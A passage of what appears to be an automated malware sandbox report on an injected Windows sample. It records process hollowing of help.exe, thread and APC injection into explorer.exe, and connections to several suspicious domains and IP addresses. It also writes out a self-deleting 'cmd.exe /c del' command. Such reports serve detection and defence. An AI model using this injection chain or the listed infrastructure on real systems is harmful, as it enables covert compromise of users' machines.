          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EAE73 mov eax, dword ptr fs:[00000030h]13_2_039EAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EAE73 mov eax, dword ptr fs:[00000030h]13_2_039EAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EAE73 mov eax, dword ptr fs:[00000030h]13_2_039EAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EAE73 mov eax, dword ptr fs:[00000030h]13_2_039EAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D766D mov eax, dword ptr fs:[00000030h]13_2_039D766D
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FFD9B mov eax, dword ptr fs:[00000030h]13_2_039FFD9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FFD9B mov eax, dword ptr fs:[00000030h]13_2_039FFD9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A905AC mov eax, dword ptr fs:[00000030h]13_2_03A905AC
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A905AC mov eax, dword ptr fs:[00000030h]13_2_03A905AC
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C2D8A mov eax, dword ptr fs:[00000030h]13_2_039C2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C2D8A mov eax, dword ptr fs:[00000030h]13_2_039C2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C2D8A mov eax, dword ptr fs:[00000030h]13_2_039C2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C2D8A mov eax, dword ptr fs:[00000030h]13_2_039C2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C2D8A mov eax, dword ptr fs:[00000030h]13_2_039C2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2581 mov eax, dword ptr fs:[00000030h]13_2_039F2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2581 mov eax, dword ptr fs:[00000030h]13_2_039F2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2581 mov eax, dword ptr fs:[00000030h]13_2_039F2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2581 mov eax, dword ptr fs:[00000030h]13_2_039F2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F1DB5 mov eax, dword ptr fs:[00000030h]13_2_039F1DB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F1DB5 mov eax, dword ptr fs:[00000030h]13_2_039F1DB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F1DB5 mov eax, dword ptr fs:[00000030h]13_2_039F1DB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F35A1 mov eax, dword ptr fs:[00000030h]13_2_039F35A1
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8FDE2 mov eax, dword ptr fs:[00000030h]13_2_03A8FDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8FDE2 mov eax, dword ptr fs:[00000030h]13_2_03A8FDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8FDE2 mov eax, dword ptr fs:[00000030h]13_2_03A8FDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8FDE2 mov eax, dword ptr fs:[00000030h]13_2_03A8FDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A78DF1 mov eax, dword ptr fs:[00000030h]13_2_03A78DF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov eax, dword ptr fs:[00000030h]13_2_03A46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov eax, dword ptr fs:[00000030h]13_2_03A46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov eax, dword ptr fs:[00000030h]13_2_03A46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov ecx, dword ptr fs:[00000030h]13_2_03A46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov eax, dword ptr fs:[00000030h]13_2_03A46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov eax, dword ptr fs:[00000030h]13_2_03A46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DD5E0 mov eax, dword ptr fs:[00000030h]13_2_039DD5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DD5E0 mov eax, dword ptr fs:[00000030h]13_2_039DD5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8E539 mov eax, dword ptr fs:[00000030h]13_2_03A8E539
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A4A537 mov eax, dword ptr fs:[00000030h]13_2_03A4A537
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A98D34 mov eax, dword ptr fs:[00000030h]13_2_03A98D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4D3B mov eax, dword ptr fs:[00000030h]13_2_039F4D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4D3B mov eax, dword ptr fs:[00000030h]13_2_039F4D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4D3B mov eax, dword ptr fs:[00000030h]13_2_039F4D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]13_2_039D3D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]13_2_039D3D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]13_2_039D3D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]13_2_039D3D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]13_2_039D3D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]13_2_039D3D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]13_2_039D3D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]13_2_039D3D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]13_2_039D3D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]13_2_039D3D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]13_2_039D3D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.65.7 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.hiddenwholesale.com
          Source: C:\Windows\explorer.exeDomain query: www.cleanxcare.com
          Source: C:\Windows\explorer.exeDomain query: www.biztekno.com
          Source: C:\Windows\explorer.exeDomain query: www.centergolosinas.com
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.65.245 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 192.169.223.13 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 151.106.118.75 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.69-1hn7uc.net
          Source: C:\Windows\explorer.exeDomain query: www.cyrilgraze.com
          Source: C:\Windows\explorer.exeDomain query: www.anewdistraction.com
          Source: C:\Windows\explorer.exeNetwork Connect: 163.43.122.119 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 78.31.67.91 80Jump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeMemory written: C:\Users\user\Desktop\SKlGhwkzTi.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: F90000Jump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Users\user\Desktop\SKlGhwkzTi.exe C:\Users\user\Desktop\SKlGhwkzTi.exeJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKlGhwkzTi.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000000.714835455.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000006.00000000.715332585.0000000001080000.00000002.00000001.sdmp, help.exe, 0000000D.00000002.919752559.00000000060F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.715332585.0000000001080000.00000002.00000001.sdmp, help.exe, 0000000D.00000002.919752559.00000000060F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.715332585.0000000001080000.00000002.00000001.sdmp, help.exe, 0000000D.00000002.919752559.00000000060F0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.715332585.0000000001080000.00000002.00000001.sdmp, help.exe, 0000000D.00000002.919752559.00000000060F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.704737422.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Users\user\Desktop\SKlGhwkzTi.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
